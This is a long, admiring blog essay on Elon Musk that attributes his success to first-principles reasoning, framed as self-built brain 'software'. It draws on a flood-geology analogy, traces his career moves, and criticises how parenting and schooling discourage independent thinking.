Welcome to the last post in the series on the world of Elon Musk.
It’s been a long one, I know. A long series with long posts and a long time between posts. It turns out that when it comes to Musk and his shit, there was a lot to say.
Anyone who’s read the first three posts in this series is aware that I’ve not only been buried in the things Musk is doing, I’ve been drinking a tall glass of the Elon Musk Kool-Aid throughout. I’m very, very into it.
I kind of feel like that’s fine, right? The dude is a steel-bending industrial giant in America in a time when there aren’t supposed to be steel-bending industrial giants in America, igniting revolutions in huge, old industries that aren’t supposed to be revolutionable. After emerging from the 1990s dotcom party with $180 million, instead of sitting back in his investor chair listening to pitches from groveling young entrepreneurs, he decided to start a brawl with a group of 900-pound sumo wrestlers—the auto industry, the oil industry, the aerospace industry, the military-industrial complex, the energy utilities—and he might actually be winning. And all of this, it really seems, for the purpose of giving our species a better future.
Pretty Kool-Aid worthy. But someone being exceptionally rad isn’t Kool-Aid worthy enough to warrant 90,000 words over a string of months on a blog that’s supposed to be about a wide range of topics.
During the first post, I laid out the two objectives for the series:
1) To understand why Musk is doing what he’s doing.
2) To understand why Musk is able to do what he’s doing.
So far, we’ve spent most of the time exploring objective #1. But what really intrigued me as I began thinking about this was objective #2. I’m fascinated by those rare people in history who manage to dramatically change the world during their short time here, and I’ve always liked to study those people and read their biographies. Those people know something the rest of us don’t, and we can learn something valuable from them. Getting access to Elon Musk gave me what I decided was an unusual chance to get my hands on one of those people and examine them up close. If it were just Musk’s money or intelligence or ambition or good intentions that made him so capable, there would be more Elon Musks out there. No, it’s something else—what TED curator Chris Anderson called Musk’s “secret sauce”—and for me, this series became a mission to figure it out.
The good news is, after a lot of time thinking about this, reading about this, and talking to him and his staff, I think I’ve got it. What for a while was a large pile of facts, observations, and sound bites eventually began to congeal into a common theme—a trait in Musk that I believe he shares with many of the most dynamic icons in history and that separates him from almost everybody else.
As I worked through the Tesla and SpaceX posts, this concept kept surfacing, and it became clear to me that this series couldn’t end without a deep dive into exactly what it is that Musk and a few others do so unusually well. The thing that tantalized me is that this secret sauce is actually accessible to everyone and right there in front of us—if we can just wrap our heads around it. Mulling this all over has legitimately affected the way I think my life, my future, and the choices I make—and I’m going to try my best in this post to explain why.
Two Kinds of Geology
In 1681, English theologian Thomas Burnet published Sacred Theory of the Earth, in which he explained how geology worked. What happened was, around 6,000 years ago, the Earth was formed as a perfect sphere with a surface of idyllic land and a watery interior. But then, when the surface dried up a little later, cracks formed in its surface, releasing much of the water from within. The result was the Biblical Deluge and Noah having to deal with a ton of shit all week. Once things settled down, the Earth was no longer a perfect sphere—all the commotion had distorted the surface, bringing about mountains and valleys and caves down below, and the whole thing was littered with the fossils of the flood’s victims.
And bingo. Burnet had figured it out. The great puzzle of fundamental theology had been to reconcile the large number of seemingly-very-old Earth features with the much shorter timeline of the Earth detailed in the Bible. For theologians of the time, it was their version of the general relativity vs. quantum mechanics quandary, and Burnet had come up with a viable string theory to unify it all under one roof.
It wasn’t just Burnet. There were enough theories kicking around reconciling geology with the verses of the Bible to today warrant a 15,000-word “Flood Geology” Wikipedia page.
Around the same time, another group of thinkers started working on the geology puzzle: scientists.
For the theologian puzzlers, the starting rules of the game were, “Fact: the Earth began 6,000 years ago and there was at one point an Earth-sweeping flood,” and their puzzling took place strictly within that context. But the scientists started the game with no rules at all. The puzzle was a blank slate where any observations and measurements they found were welcome.
Over the next 300 years, the scientists built theory upon theory, and as new technologies brought in new types of measurements, old theories were debunked and replaced with new updated versions. The science community kept surprising themselves as the apparent age of the Earth grew longer and longer. In 1907, there was a huge breakthrough when American scientist Bertram Boltwood pioneered the technique of deciphering the age of rocks through radiometric dating, which found elements in a rock with a known rate of radioactive decay and measured what portion of those elements remained intact and what portion had already converted to decay substance.
Radiometric dating blew Earth’s history backwards into the billions of years, which burst open new breakthroughs in science like the theory of Continental Drift, which in turn led to the theory of Plate Tectonics. The scientists were on a roll.
Meanwhile, the flood geologists would have none of it. To them, any conclusions from the science community were moot because they were breaking the rules of the game to begin with. The Earth was officially less than 6,000 years old, so if radiometric dating showed otherwise, it was a flawed technique, period.
But the scientific evidence grew increasingly compelling, and as time wore on, more and more flood geologists threw in the towel and accepted the scientist’s viewpoint—maybe they had had the rules of the game wrong.
Some, though, held strong. The rules were the rules, and it didn’t matter how many people agreed that the Earth was billions of years old—it was a grand conspiracy.
Today, there are still many flood geologists making their case. Just recently, an author named Tom Vail wrote a book called Grand Canyon: A Different View, in which he explains:
Contrary to what is widely believed, radioactive dating has not proven the rocks of the Grand Canyon to be millions of years old. The vast majority of the sedimentary layers in the Grand Canyon were deposited as the result of a global flood that occurred after and as a result of the initial sin that took place in the Garden of Eden.
If the website analytics stats on Chartbeat included a “Type of Geologist” demographic metric, I imagine that for Wait But Why readers, the breakdown would look something like this:
Geology Breakdown
It makes sense. Whether religious or not, most people who read this site are big on data, evidence, and accuracy. I’m reminded of this every time I make an error in a post.
Whatever role faith plays in the spiritual realm, what most of us agree on is that when seeking answers to our questions about the age of the Earth, the history of our species, the causes of lightning, or any other physical phenomenon in the universe, data and logic are far more effective tools than faith and scripture.
And yet—after thinking about this for a while, I’ve come to an unpleasant conclusion:
When it comes to most of the way we think, the way we make decisions, and the way we live our lives, we’re much more like the flood geologists than the science geologists.
And Elon’s secret? He’s a scientist through and through.
Hardware and Software
The first clue to the way Musk thinks is in the super odd way that he talks. For example:
Human child: “I’m scared of the dark, because that’s when all the scary shit is gonna get me and I won’t be able to see it coming.”
Elon: “When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.”2
Or:
Human father: “I’d like to start working less because my kids are starting to grow up.”
Elon: “I’m trying to throttle back, because particularly the triplets are starting to gain consciousness. They’re almost two.”3
Or:
Human single man: “I’d like to find a girlfriend. I don’t want to be so busy with work that I have no time for dating.”
Elon: “I would like to allocate more time to dating, though. I need to find a girlfriend. That’s why I need to carve out just a little more time. I think maybe even another five to 10 — how much time does a woman want a week? Maybe 10 hours? That’s kind of the minimum? I don’t know.”4
I call this MuskSpeak. MuskSpeak is a language that describes everyday parts of life as exactly what they actually, literally are.
There are plenty of instances of technical situations when we all agree that MuskSpeak makes much more sense than normal human parlance—
Heart Surgery
—but what makes Musk odd is that he thinks about most things in MuskSpeak, including many areas where you don’t usually find it. Like when I asked him if he was afraid of death, and he said having kids made him more comfortable with dying, because “kids sort of are a bit you. At least they’re half you. They’re half you at the hardware level, and depending on how much time you have with them, they’re that percentage of you at the software level.”
When you or I look at kids, we see small, dumb, cute people. When Musk looks at his five kids, he sees five of his favorite computers. When he looks at you, he sees a computer. And when he looks in the mirror, he sees a computer—his computer. It’s not that Musk suggests that people are just computers—it’s that he sees people as computers on top of whatever else they are.
And at the most literal level, Elon’s right about people being computers. At its simplest definition, a computer is an object that can store and process data—which the brain certainly is.
And while this isn’t the most poetic way to think about our minds, I’m starting to believe that it’s one of those areas of life where MuskSpeak can serve us well—because thinking of a brain as a computer forces us to consider the distinction between our hardware and our software, a distinction we often fail to recognize.
For a computer, hardware is defined as “the machines, wiring, and other physical components of a computer.” So for a human, that’s the physical brain they were born with and all of its capabilities, which determines their raw intelligence, their innate talents, and other natural strengths and shortcomings.
A computer’s software is defined as “the programs and other operating information used by a computer.” For a human, that’s what they know and how they think—their belief systems, thought patterns, and reasoning methods. Life is a flood of incoming data of all kinds that enter the brain through our senses, and it’s the software that assesses and filters all that input, processes and organizes it, and ultimately uses it to generate the key output—a decision.
The hardware is a ball of clay that’s handed to us when we’re born. And of course, not all clay is equal—each brain begins as a unique combination of strengths and weaknesses across a wide range of processes and capabilities.
But it’s the software that determines what kind of tool the clay gets shaped into.
When people think about what makes someone like Elon Musk so effective, they often focus on the hardware—and Musk’s hardware has some pretty impressive specs. But the more I learn about Musk and other people who seem to have superhuman powers—whether it be Steve Jobs, Albert Einstein, Henry Ford, Genghis Khan, Marie Curie, John Lennon, Ayn Rand, or Louis C.K.—the more I’m convinced that it’s their software, not their natural-born intelligence or talents, that makes them so rare and so effective.
So let’s talk about software—starting with Musk’s. As I wrote the other three posts in this series, I looked at everything I was learning about Musk—the things he says, the decisions he makes, the missions he takes on and how he approaches them—as clues to how his underlying software works.
Eventually, the clues piled up and the shape of the software began to reveal itself. Here’s what I think it looks like:
Elon’s Software
The structure of Musk’s software starts like many of ours, with what we’ll call the Want box:
Software - Want Box
This box contains anything in life where you want Situation A to turn into Situation B. Situation A is currently what’s happening and you want something to change so that Situation B is what’s happening instead. Some examples:
Wants
Next, the Want box has a partner in crime—what we’ll call the Reality box. It contains all things that are possible:
Software - Reality Box
Pretty straightforward.
The overlap of the Want and Reality boxes is the Goal Pool, where your goal options live:2
Software - Goal Pool
So you pick a goal from the pool—the thing you’re going to try to move from Point A to Point B.
And how do you cause something to change? You direct your power towards it. A person’s power can come in various forms: your time, your energy (mental and physical), your resources, your persuasive ability, your connection to others, etc.
The concept of employment is just Person A using their resources power (a paycheck) to direct Person B’s time and/or energy power toward Person A’s goal. When Oprah publicly recommends a book, that’s combining her abundant power of connection (she has a huge reach) and her abundant power of persuasion (people trust her) and directing them towards the goal of getting the book into the hands of thousands of people who would have otherwise never known about it.
Once a goal has been selected, you know the direction in which to point your power. Now it’s time to figure out the most effective way to use that power to generate the outcome you want—that’s your strategy:
Software - Strategy Box
Simple right? And probably not that different from how you think.
But what makes Musk’s software so effective isn’t its structure, it’s that he uses it like a scientist. Carl Sagan said, “Science is a way of thinking much more than it is a body of knowledge,” and you can see Musk apply that way of thinking in two key ways:
1) He builds each software component himself, from the ground up.
Musk calls this “reasoning from first principles.” I’ll let him explain:
I think generally people’s thinking process is too bound by convention or analogy to prior experiences. It’s rare that people try to think of something on a first principles basis. They’ll say, “We’ll do that because it’s always been done that way.” Or they’ll not do it because “Well, nobody’s ever done that, so it must not be good.” But that’s just a ridiculous way to think. You have to build up the reasoning from the ground up—“from the first principles” is the phrase that’s used in physics. You look at the fundamentals and construct your reasoning from that, and then you see if you have a conclusion that works or doesn’t work, and it may or may not be different from what people have done in the past.
In science, this means starting with what evidence shows us to be true. A scientist doesn’t say, “Well we know the Earth is flat because that’s the way it looks, that’s what’s intuitive, and that’s what everyone agrees is true,” a scientist says, “The part of the Earth that I can see at any given time appears to be flat, which would be the case when looking at a small piece of many differently shaped objects up close, so I don’t have enough information to know what the shape of the Earth is. One reasonable hypothesis is that the Earth is flat, but until we have tools and techniques that can be used to prove or disprove that hypothesis, it is an open question.”
A scientist gathers together only what he or she knows to be true—the first principles—and uses those as the puzzle pieces with which to construct a conclusion.
Reasoning from first principles is a hard thing to do in life, and Musk is a master at it. Brain software has four major decision-making centers:
1) Filling in the Want box
2) Filling in the Reality box
3) Goal selection from the Goal Pool
4) Strategy formation
Musk works through each of these boxes by reasoning from first principles. Filling in the Want box from first principles requires a deep, honest, and independent understanding of yourself. Filling in the Reality box requires the clearest possible picture of the actual facts of both the world and your own abilities. The Goal Pool should double as a Goal Selection Laboratory that contains tools for intelligently measuring and weighing options. And strategies should be formed based on what you know, not on what is typically done.
2) He continually adjusts each component’s conclusions as new information comes in.
You might remember doing proofs in geometry class, one of the most mundane parts of everyone’s childhood. These ones:
Given: A = B
Given: B = C + D
Therefore: A = C + D
Math is satisfyingly exact. Its givens are exact and its conclusions are airtight.
In math, we call givens “axioms,” and axioms are 100% true. So when we build conclusions out of axioms, we call them “proofs,” which are also 100% true.
Science doesn’t have axioms or proofs, for good reason.
We could have called Newton’s law of universal gravitation a proof—and for a long time, it certainly seemed like one—but then what happens when Einstein comes around and shows that Newton was actually “zoomed in,” like someone calling the Earth flat, and when you zoom way out, you discover that the real law is general relativity and Newton’s law actually stops working under extreme conditions, while general relativity works no matter what. So then, you’d call general relativity a proof instead. Except then what happens when quantum mechanics comes around and shows that general relativity fails to apply on a tiny scale and that a new set of laws is needed to account for those cases.
There are no axioms or proofs in science because nothing is for sure and everything we feel sure about might be disproven. Richard Feynman has said, “Scientific knowledge is a body of statements of varying degrees of certainty—some most unsure, some nearly sure, none absolutely certain.” Instead of proofs, science has theories. Theories are based on hard evidence and treated as truths, but at all times they’re susceptible to being adjusted or disproven as new data emerges.
So in science, it’s more like:
Given (for now): A = B
Given (for now): B = C + D
Therefore (for now): A = C + D
In our lives, the only true axiom is “I exist.” Beyond that, nothing is for sure. And for most things in life, we can’t even build a real scientific theory because life doesn’t tend to have exact measurements.
Usually, the best we can do is a strong hunch based on what data we have. And in science, a hunch is called a hypothesis. Which works like this:
Given (it seems, based on what I know): A = B
Given (it seems, based on what I know): B = C + D
Therefore (it seems, based on what I know): A = C + D
Hypotheses are built to be tested. Testing a hypothesis can disprove it or strengthen it, and if it passes enough tests, it can be upgraded to a theory.
So after Musk builds his conclusions from first principles, what does he do? He tests the shit out of them, continually, and adjusts them regularly based on what he learns. Let’s go through the whole process to show how:
You begin by reasoning from first principles to A) fill in the Want box, B) fill in the Reality box, C) select a goal from the pool, and D) build a strategy—and then you get to work. You’ve used first principles thinking to decide where to point your power and the most effective way to use it.
But the goal-achievement strategy you came up with was just your first crack. It was a hypothesis, ripe for testing. You test a strategy hypothesis one way: action. You pour your power into the strategy and see what happens. As you do this, data starts flowing in—results, feedback, and new information from the outside world. Certain parts of your strategy hypothesis might be strengthened by this new data, others might be weakened, and new ideas may have sprung to life in your head through the experience—but either way, some adjustment is usually called for:
Software - Strategy Loop
As this strategy loop spins and your power becomes more and more effective at accomplishing your goal, other things are happening down below.
For someone reasoning from first principles, the Want box at any given time is a snapshot of their innermost desires the last time they thought hard about it. But the contents of the Want box are also a hypothesis, and experience can show you that you were wrong about something you thought you wanted or that you want something you didn’t realize you did. At the same time, the inner you isn’t a statue—it’s a shifting, morphing sculpture whose innermost values change as time passes. So even if something in the Want box was correct at one point, as you change, it may lose its place in the box. The Want box should serve the current inner you as best possible, which requires you to update it, something you do through reflection:
Software - Want Loop
A rotating Want loop is called evolution.
On the other side of the aisle, the Reality box is also going through a process. “Things that are possible” is a hypothesis, maybe more so than anything else. It takes into account both the state of the world and your own abilities. And as your own abilities change and grow, the world changes even faster. What was possible in the world in 2005 is very different from what’s possible today, and it’s a huge (and rare) advantage to be working with an up-to-date Reality box.
Filling in your Reality box from first principles is a great challenge, and keeping the box current so that it matches actual reality takes continual work.
Software - Reality Loop
For each of these areas, the box represents the current hypothesis and the circle represents the source of new information that can be used to adjust the hypothesis.
In the science world, the circle is truth, which scientists access by mining for new information in laboratories, studies, and experiments.
Science Loop
New information-mining is happening all the time and hypotheses and theories are in turn being revised regularly.
In life, it’s our duty to remember that the circles are the boss, not the boxes—the boxes are only trying their best to do the circles proud. And if we fall out of touch with what’s happening in the circles, the info in the boxes becomes obsolete and a less effective source for our decision-making.
Thinking about the software as a whole, let’s take a step back. What we see is a goal formation mechanism below and a goal attainment mechanism above. One thing goal attainment often requires is laser focus. To get the results we want, we zoom in on the micro picture, sinking our teeth into our goal and honing in on it with our strategy loop.
But as time passes, the Want box and Reality box adjust contents and morph shape, and eventually, something else can happen—the Goal Pool changes.
The Goal Pool is just the overlap of the Want and Reality boxes, so its own shape and contents are totally dependent on the state of those boxes. And as you live your life inside the goal attainment mechanism above, it’s important to make sure that what you’re working so hard on remains in line with the Goal Pool below—so let’s add in two big red arrows for that:
Software - Full
Checking in with the large circle down below requires us to lift our heads up from the micro mission and do some macro reflection. And when enough changes happen in the Want and Reality boxes that the goal you’re pursuing is no longer in the goal pool, it calls for a macro life change—a breakup, a job switch, a relocation, a priority swap, an attitude shift.
All together, the software I’ve described is a living, breathing system, constructed on a rock solid foundation of first principles, and built to be nimble, to keep itself honest, and to change shape as needed to best serve its owner.
And if you read about Elon Musk’s life, you can watch this software in action.
How Musk’s software wrote his life story
Getting started
Step 1 for Elon was filling in the contents of the Want box. Doing this from first principles is a huge challenge—you have to dig deep into concepts like right and wrong, good and bad, important and valuable, frivolous and trivial. You have to figure out what you respect, what you disdain, what fascinates you, what bores you, and what excites you deep in your inner child. Of course, there’s no way for anyone of any age to have a clear cut answer to these questions, but Elon did the best thing he could by ignoring others and independently pondering.
I talked with him about his early thought process in figuring out what to do with his career. He has said many times that he cares deeply about the future well-being of the human species—something that is clearly in the center of his Want box. I asked how he came to that, and he explained:
The thing that I care about is—when I look into the future, I see the future as a series of branching probability streams. So you have to ask, what are we doing to move down the good stream—the one that’s likely to make for a good future? Because otherwise, you look ahead, and it’s like “Oh it’s dark.” If you’re projecting to the future, and you’re saying “Wow, we’re gonna end up in some terrible situation,” that’s depressing.
Fair. Honing in on his specific path, I brought up the great modern physicists like Einstein and Hawking and Feynman, and I asked him whether he considered going into scientific discovery instead of engineering. His response:
I certainly admire the discoveries of the great scientists. They’re discovering what already exists—it’s a deeper understanding of how the universe already works. That’s cool—but the universe already sort of knows that. What matters is knowledge in a human context. What I’m trying to ensure is that knowledge in a human context is still possible in the future. So it’s sort of like—I’m more like the gardener, and then there are the flowers. If there’s no garden, there’s no flowers. I could try to be a flower in the garden, or I could try to make sure there is a garden. So I’m trying to make sure there is a garden, such that in the future, many Feynmans may bloom.
In other words, both A and B are good, but without A there is no B. So I choose A.
He went on:
I was at one point thinking about doing physics as a career—I did undergrad in physics—but in order to really advance physics these days, you need the data. Physics is fundamentally governed by the progress of engineering. This debate—“Which is better, engineers or scientists? Aren’t scientists better? Wasn’t Einstein the smartest person?”—personally, I think that engineering is better because in the absence of the engineering, you do not have the data. You just hit a limit. And yeah, you can be real smart within the context of the limit of the data you have, but unless you have a way to get more data, you can’t make progress. Like look at Galileo. He engineered the telescope—that’s what allowed him to see that Jupiter had moons. The limiting factor, if you will, is the engineering. And if you want to advance civilization, you must address the limiting factor. Therefore, you must address the engineering.
A and B are both good, but B can only advance if A advances. So I choose A.
In thinking about where exactly to point himself to best help humanity, Musk says that in college, he thought hard about the first principles question, “What will most affect the future of humanity?” and put together a list of five things: “the internet; sustainable energy; space exploration, in particular the permanent extension of life beyond Earth; artificial intelligence; and reprogramming the human genetic code.”5
Hearing him talk about what matters to him, you can see up and down the whole stack of Want box reasoning that led him to his current endeavors.
He has other reasons too. Next to wanting to help humanity in the Want box is this quote:
I’m interested in things that change the world or affect future in wondrous new technology where you see it and you’re like, “How did that even happen? How is that possible?”
This follows a theme of Musk being passionate about super-advanced technology and the excitement it brings to him and other people. So an ideal endeavor for Musk would be something to do with engineering, something in an area that will be important for the future, and something to do with cutting-edge technology. Those broad, basic Want box items alone narrow down the goal pool considerably.
Meanwhile, he was a teenager with no money, reputation, or connections, and limited knowledge and skills. In other words, his Reality box wasn’t that big. So he did what many young people do—he focused his early goals not around achieving his Wants, but expanding the Reality box and its list of “things that are possible.” He wanted to be able to legally stay in the US after college, and he also wanted to gain more knowledge about engineering, so he killed two birds with one stone and applied to a PhD program at Stanford to study high energy density capacitors, a technology aimed at coming up with a more efficient way than traditional batteries to store energy.
U-turn to the internet
Musk had gone into the Goal Pool and picked the Stanford program, and he moved to California to get started. But there was one thing—it was 1995. The internet was in the early stages of taking off and moving much faster than people had anticipated. It was also a world he could dive into without money or a reputation. So Musk added a bunch of internet-related possibilities into his Reality box. The early internet was also more exciting than he had anticipated—so getting involved in it quickly found its way into his Want box.
These rapid adjustments caused big changes in his Goal Pool, to the point where the Stanford PhD was no longer what his software’s goal formation center was outputting.
Most people would have stuck with the Stanford program—because they had already told everyone about it and it would be weird to quit, because it was Stanford, because it was a more normal path, because it was safer, because the internet might be a fad, because what if he were 35 one day and was a failure with no money because he couldn’t get a good job without the right degree.
Musk quit the program after two days. The big macro arrow of his software came down on the right, saw that what he was embarking on wasn’t in the Goal Pool anymore, and he trusted his software—so he made a macro change.
He started Zip2 with his brother, an early cross between the concepts of the Yellow Pages and Google Maps. Four years later, they sold the company and Elon walked away with $22 million.
As a dotcom millionaire, the conventional wisdom was to settle down as a lifelong rich guy and either invest in other companies or start something new with other people’s money.
But Musk’s goal formation center had other ideas. His Want box was bursting with ambitious startup ideas that he thought could have major impact on the world, and his Reality box, which now included $22 million, told him that he had a high chance of succeeding. Being leisurely on the sidelines was nowhere in his Want box and totally unnecessary according to his Reality box.
So he used his newfound wealth to start X.com in 1999, with the vision to build a full-service online financial institution. The internet was still young and the concept of storing your money in an online bank was totally inconceivable to most people, and Musk was advised by many that it was a crazy plan. But again, Musk trusted his software. What he knew about the internet told him that this was inside the Reality box—because his reasoning told him that when it came to the internet, the Reality box had grown much bigger than people realized—and that was all he needed to know to move forward. In the top part of his software, as his strategy-action-results-adjustments loop spun, X.com’s service changed, the team changed, the mission changed, even the name changed. By the time eBay bought it in 2002, the company was called PayPal and it was a money transfer service. Musk made $180 million.
Following his software to space
Now 31 years old and fabulously wealthy, Musk had to figure out what to do next with his life. On top of the “whatever you do, definitely don’t risk losing that money you have” conventional wisdom, there was also the common logic that said, “You’re awesome at building internet companies, but that’s all you know since you’ve never done anything else. You’re in your thirties now and it’s too late to do something big in a whole different field. This is the path you chose—you’re an internet guy.”
But Musk went back to first principles. He looked inwards to his Want box, and having reflected on things, doing another internet thing wasn’t really in the box anymore. What was in there was his still-burning desire to help the future of humanity. In particular, he felt that to have a long future, the species would have to become much better at space travel.
So he started exploring the limits of the Reality box when it came to getting involved in the aerospace industry.
Conventional wisdom screamed at the top of its lungs for him to stop. It said he had no formal education in the field and didn’t know the first thing about being a rocket scientist. But his software told him that formal education was just another way to download information into your brain and “a painfully slow download” at that—so he started reading, meeting people, and asking questions.
Conventional wisdom said no entrepreneur had ever succeeded at an endeavor like this before, and that he shouldn’t risk his money on something so likely to fail. But Musk’s stated philosophy is, “When something is important enough, you do it even if the odds are not in your favor.”
Conventional wisdom said that he couldn’t afford to build rockets because they were too expensive and pointed to the fact that no one had ever made a rocket that cheaply before—but like the scientists who ignored those who said the Earth was 6,000 years old and those who insisted the Earth was flat, Musk started crunching numbers to do the math himself. Here’s how he recounts his thoughts:
Historically, all rockets have been expensive, so therefore, in the future, all rockets will be expensive. But actually that’s not true. If you say, what is a rocket made of? It’s made of aluminum, titanium, copper, carbon fiber. And you can break it down and say, what is the raw material cost of all these components? And if you have them stacked on the floor and could wave a magic wand so that the cost of rearranging the atoms was zero, then what would the cost of the rocket be? And I was like, wow, okay, it’s really small—it’s like 2% of what a rocket costs. So clearly it would be in how the atoms are arranged—so you’ve got to figure out how can we get the atoms in the right shape much more efficiently. And so I had a series of meetings on Saturdays with people, some of whom were still working at the big aerospace companies, just to try to figure out if there’s some catch here that I’m not appreciating. And I couldn’t figure it out. There doesn’t seem to be any catch. So I started SpaceX.6
History, conventional wisdom, and his friends all said one thing, but his own software, reasoning upwards from first principles, said another—and he trusted his software. He started SpaceX, again with his own money, and dove in head xfirst. The mission: dramatically lower the cost of space travel to make it possible for humanity to become multi-planetary.
Tesla and beyond
Two years later, while running a growing SpaceX, a friend brought Elon to a company called AC Propulsion, which had created a prototype for a super-fast, long-range electric car. It blew him away. The Reality box of Musk’s software had told him that such a thing wasn’t yet possible, but it turns out that Musk wasn’t aware of how far lithium-ion batteries had advanced, and what he saw at AC Propulsion was new information about the world that put “starting a top-notch electric car company” into the Reality box in his head.
He ran into the same conventional wisdom about battery costs as he had about rocket costs. Batteries had never been made cheaply enough to allow for a mass-market, long-range electric car because battery prices were simply too high and always would be. He used the same first principles logic and a calculator to determine that most of the problem was middlemen, not raw materials, and decided that actually, conventional wisdom was wrong and batteries could be much cheaper in the future. So he co-founded Tesla with the mission of accelerating the advent of a mostly-electric-vehicle world—first by pouring in resources power and funding the company, and later by contributing his time and energy resources as well and becoming CEO.
Two years after that, he co-founded SolarCity with his cousins, a company whose goal was to revolutionize energy production by creating a large, distributed utility that would install solar panel systems on millions of people’s homes. Musk knew that his time/energy power, the one kind of power that has hard limits, no matter who you are, was mostly used up, but he still had plenty of resources power—so he put it to work on another goal in his Goal Pool.
Most recently, Musk has jumpstarted change in another area that’s important to him—the way people transport themselves from city to city. His idea is that there should be an entirely new mode of transport that will whiz people hundreds of miles by zinging them through a tube. He calls it the Hyperloop. For this project, he’s not using his time, energy, or resources. Instead, by laying out his initial thoughts in a white paper and hosting a competition for engineers to test out their innovations, he’s leveraging his powers of connection and persuasion to create change.
There are all kinds of tech companies that build software. They think hard, for years, about the best, most efficient way to make their product. Musk sees people as computers, and he sees his brain software as the most important product he owns—and since there aren’t companies out there designing brain software, he designed his own, beta tests it every day, and makes constant updates. That’s why he’s so outrageously effective, why he can disrupt multiple huge industries at once, why he can learn so quickly, strategize so cleverly, and visualize the future so clearly.
This part of what Musk does isn’t rocket science—it’s common sense. Your entire life runs on the software in your head—why wouldn’t you obsess over optimizing it?
And yet, not only do most of us not obsess over our own software—most of us don’t even understand our own software, how it works, or why it works that way. Let’s try to figure out why.
Most People’s Software
You always hear facts about human development and how so much of who you become is determined by your experiences during your formative years. A newborn’s brain is a malleable ball of hardware clay, and its job upon being born is to quickly learn about whatever environment it’s been born into and start shaping itself into the optimal tool for survival in those circumstances. That’s why it’s so easy for young children to learn new skills.
As people age, the clay begins to harden and it becomes more difficult to change the way the brain operates. My grandmother has been using a computer as long as I have, but I use mine comfortably and easily because my malleable childhood brain easily wrapped itself around basic computer skills, while she has the same face on when she uses her computer that my tortoise does when I put him on top of a glass table and he thinks he’s inexplicably hovering two feet above the ground. She’ll use a computer when she needs to, but it’s not her friend.
So when it comes to our brain software—our values, perceptions, belief systems, reasoning techniques—what are we learning during those key early years?
Everyone’s raised differently, but for most people I know, it went something like this:
We were taught all kinds of things by our parents and teachers—what’s right and wrong, what’s safe and dangerous, the kind of person you should and shouldn’t be. But the idea was: I’m an adult so I know much more about this than you, it’s not up for debate, don’t argue, just obey. That’s when the cliché “Why?” game comes in (what ElonSpeak calls “the chained why”).
A child’s instinct isn’t just to know what to do and not to do, she wants to understand the rules of her environment. And to understand something, you have to have a sense of how that thing was built. When parents and teachers tell a kid to do XYZ and to simply obey, it’s like installing a piece of already-designed software in the kid’s head. When kids ask Why? and then Why? and then Why?, they’re trying to deconstruct that software to see how it was built—to get down to the first principles underneath so they can weigh how much they should actually care about what the adults seem so insistent upon.
The first few times a kid plays the Why game, parents think it’s cute. But many parents, and most teachers, soon come up with a way to cut the game off:
Because I said so.
“Because I said so” inserts a concrete floor into the child’s deconstruction effort below which no further Why’s may pass. It says, “You want first principles? There. There’s your floor. No more Why’s necessary. Now fucking put your boots on because I said so and let’s go.”
Imagine how this would play out in the science world.
Higgs Hawking 1Higgs Hawking 2Higgs Hawking 3
Higgs Hawking 5Higgs Hawking 6Higgs Hawking 8Higgs Hawking 9Higgs Hawking 10
In fairness, parents’ lives suck. They have to do all the shit they used to have to do, except now on top of that there are these self-obsessed, drippy little creatures they have to upkeep, who think parents exist to serve them. On a busy day, in a bad mood, with 80 things to do, the Why game is a nightmare.
But it might be a nightmare worth enduring. A command or a lesson or a word of wisdom that comes without any insight into the steps of logic it was built upon is feeding a kid a fish instead of teaching them to reason. And when that’s the way we’re brought up, we end up with a bucket of fish and no rod—a piece of installed software that we’ve learned how to use, but no ability to code anything ourselves.
School makes things worse. One of my favorite thinkers, writer Seth Godin (whose blog is bursting with first principles reasoning wisdom), explains in a TED Talk about school that the current education system is a product of the Industrial Age, a time that catapulted productivity and the standard of living. But along with many more factories came the need for many more factory workers, so our education system was redesigned around that goal. He explains:
The deal was: universal public education whose sole intent was not to train the scholars of tomorrow—we had plenty of scholars. It was to train people to be willing to work in the factory. It was to train people to behave, to comply, to fit in. “We process you for a whole year. If you are defective, we hold you back and process you again. We sit you in straight rows, just like they organize things in the factory. We build a system all about interchangeable people because factories are based on interchangeable parts.”
Couple that concept with what another favorite writer of mine, James Clear, explained recently on his blog:
In the 1960s, a creative performance researcher named George Land conducted a study of 1,600 five-year-olds and 98 percent of the children scored in the “highly creative” range. Dr. Land re-tested each subject during five year increments. When the same children were 10-years-old, only 30 percent scored in the highly creative range. This number dropped to 12 percent by age 15 and just 2 percent by age 25. As the children grew into adults they effectively had the creativity trained out of them. In the words of Dr. Land, “non-creative behavior is learned.”
It makes sense, right? Creative thinking is a close cousin of first principles reasoning. In both cases, the thinker needs to invent his own thought pathways. People think of creativity as a natural born talent, but it’s actually much more of a way of thinking—it’s the thinking version of painting onto a blank canvas. But to do that requires brain software that’s skilled and practiced at coming up with new things, and school trains us on the exact opposite thing—to follow the leader, single-file, and to get really good at taking tests. Instead of a blank canvas, school hands kids a coloring book and tells them to stay within the lines.3
What this all amounts to is that during our brain’s most malleable years, parents, teachers, and society end up putting our clay in a mold and squeezing it tightly into a preset shape.
And when we grow up, without having learned how to build our own style of reasoning and having gone through the early soul-searching that independent thinking requires, we end up needing to rely on whatever software was installed in us for everything—software that, coming from parents and teachers, was probably itself designed 30 years ago.
30 years, if we’re lucky. Let’s think about this for a second.
Just say you have an overbearing mother who insists you grow up with her values, her worldview, her fears, and her ambitions—because she knows best, because it’s a scary world out there, because XYZ is respectable, because she said so.
Your head might end up running your whole life on “because mom says so” software. If you play the Why? game with something like the reason you’re in your current job, it may take a few Why’s to get there, but you’ll most likely end up hitting a concrete floor that says some version of “because mom says so.”
But why does mom say so?
Mom says so because her mom said so—after growing up in Poland in 1932, where she was from a home where her dad said so because his dad—a minister from a small town outside Krakow—said so after his grandfather, who saw some terrible shit go down during the Siberian Uprising of 1866, ingrained in his children’s heads the critical life lesson to never associate with blacksmiths.
Through a long game of telephone, your mother now looks down upon office jobs and you find yourself feeling strongly about the only truly respectable career being in publishing. And you can list off a bunch of reasons why you feel that way—but if someone really grilled you on your reasons and on the reasoning beneath them, you end up in a confusing place. It gets confusing way down there because the first principles foundation at the bottom is a mishmash of the values and beliefs of a bunch of people from different generations and countries—a bunch of people who aren’t you.
